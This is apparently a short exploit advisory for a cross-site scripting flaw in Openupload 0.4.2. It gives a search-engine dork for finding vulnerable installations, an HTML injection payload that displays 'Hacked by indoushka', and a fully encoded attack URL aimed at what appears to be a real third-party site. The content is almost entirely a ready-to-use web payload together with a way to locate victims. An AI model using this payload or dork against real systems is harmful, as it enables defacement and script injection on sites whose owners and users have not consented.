======================================================================== | # Title : Openupload 0.4.2 Xss vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 10 Français V.(Pro) | # Version : 0.4.2 | # Vendor : http://wmscripti.com/ | # Dork : open upload - login ======================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee> https://ftp.televerbier.ch/index.php?action=login&lang=fr&step=1%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------ | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz | | ===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ =============================